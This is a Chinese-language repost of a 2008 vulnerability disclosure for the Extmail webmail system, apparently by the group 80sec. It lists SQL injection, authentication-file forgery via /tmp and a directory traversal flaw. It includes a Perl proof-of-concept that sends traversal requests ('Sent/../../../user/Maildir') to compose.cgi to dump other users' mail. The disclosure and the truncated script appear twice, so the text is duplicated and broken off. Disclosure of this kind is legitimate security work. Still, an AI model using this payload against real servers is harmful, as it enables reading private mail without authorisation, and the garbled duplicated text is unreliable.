对Extmail安全漏洞的分析
2008-09-11 16:14
246 查看
漏洞厂商:http://www.extmail.org/
漏洞解析:
1 SQL注射漏洞
程序在处理用户登陆参数的地方没有对SQL注射进行防护,导致可能产生SQL注射漏洞,该处没有回显,但是利用延迟技术,一样可以进行敏感信息获取
2 任意用户身份获取漏洞
程序在处理全局用户参数提交时产生错误,导致匿名用户可以在该会话期间内上传文件到/tmp/目录,而程序的所有认证机制都是依靠/tmp/下的文件来处理的,所以匿名用户可以伪造认证文件来窃取其他的用户身份
3 任意信件读取漏洞
程序依靠文件处理系统来区分各个用户和信件,但是程序在处理个别参数的时候存在安全漏洞,导致用户可以跳出目录进入其他人的目录读取敏感信息如信件。
漏洞状态:80sec已经通知官方,但是到目前没有获得任何回复
漏洞证明:80sec发放任意信件读取漏洞的POC
#!/usr/bin/perl
#Exp for Ext-mail
#Codz By 80sec http://www.80sec.com
use LWP;
my $browser = LWP::UserAgent->new;
$mysid="d9a4c4f05aca535d696f8983a23e42bd";
$mytarget="http://www.80sec.com/";
$user='80sec';
$ARGV[0]&&($user=$ARGV[0]);
open(RESULT,”>>$user.txt”);
for($i=0;;$i++) {
my @headers=(’Cookie’=>”sid=$mysid”,’User-Agent’=>’Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)’,);
$myresponse=$browser->post(”${mytarget}compose.cgi”,['__mode'=>'edit_forward','folder'=>"Sent/../../../${user}/Maildir",'pos'=>"$i"],@headers);
$myecho=$myresponse->content;
漏洞解析:
1 SQL注射漏洞
程序在处理用户登陆参数的地方没有对SQL注射进行防护,导致可能产生SQL注射漏洞,该处没有回显,但是利用延迟技术,一样可以进行敏感信息获取
2 任意用户身份获取漏洞
程序在处理全局用户参数提交时产生错误,导致匿名用户可以在该会话期间内上传文件到/tmp/目录,而程序的所有认证机制都是依靠/tmp/下的文件来处理的,所以匿名用户可以伪造认证文件来窃取其他的用户身份
3 任意信件读取漏洞
程序依靠文件处理系统来区分各个用户和信件,但是程序在处理个别参数的时候存在安全漏洞,导致用户可以跳出目录进入其他人的目录读取敏感信息如信件。
漏洞状态:80sec已经通知官方,但是到目前没有获得任何回复
漏洞证明:80sec发放任意信件读取漏洞的POC
#!/usr/bin/perl
#Exp for Ext-mail
#Codz By 80sec http://www.80sec.com
use LWP;
my $browser = LWP::UserAgent->new;
$mysid="d9a4c4f05aca535d696f8983a23e42bd";
$mytarget="http://www.80sec.com/";
$user='80sec';
$ARGV[0]&&($user=$ARGV[0]);
open(RESULT,”>>$user.txt”);
for($i=0;;$i++) {
my @headers=(’Cookie’=>”sid=$mysid”,’User-Agent’=>’Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)’,);
$myresponse=$browser->post(”${mytarget}compose.cgi”,['__mode'=>'edit_forward','folder'=>"Sent/../../../${user}/Maildir",'pos'=>"$i"],@headers);
$myecho=$myresponse->content;
相关文章推荐
- 全面分析Web应用程序安全漏洞——《黑客攻防技术宝典:web实战篇》
- 针对移动手机漏洞与安全支付现状分析
- 安全漏洞扫描,风险原因分析及解决方案
- PP安全漏洞分析! 爱加密提供APP安全检测。
- 0day安全-软件漏洞分析技术(第一版)--8_3_vtable 虚表攻击源码改造
- 网站安全漏洞的产生分析与处理总结
- MySQL安全分析:缓解MySQL零日漏洞
- 九大角度分析数据库安全漏洞
- 漏洞分析---gotofail:苹果 SSL/TLS 重大安全漏洞的细节
- 一个IE浏览器漏洞的安全测试及分析
- 全面分析Web应用程序安全漏洞——《黑客攻防技术宝典:web实战篇》
- 常见WEB开发安全漏洞、原因分析及解决之道
- 暂停交易?ERC20合约整数溢出安全漏洞案例技术分析(一)
- Unix主机安全漏洞分析及漏洞扫描器的设计与实现
- 【漏洞分析】Discuz X3.3补丁安全分析
- Struts2最新安全漏洞分析
- web上存漏洞及原理分析、防范方法(安全文件上存方法)
- 全面分析Web应用程序安全漏洞——《黑客攻防技术宝典:web实战篇》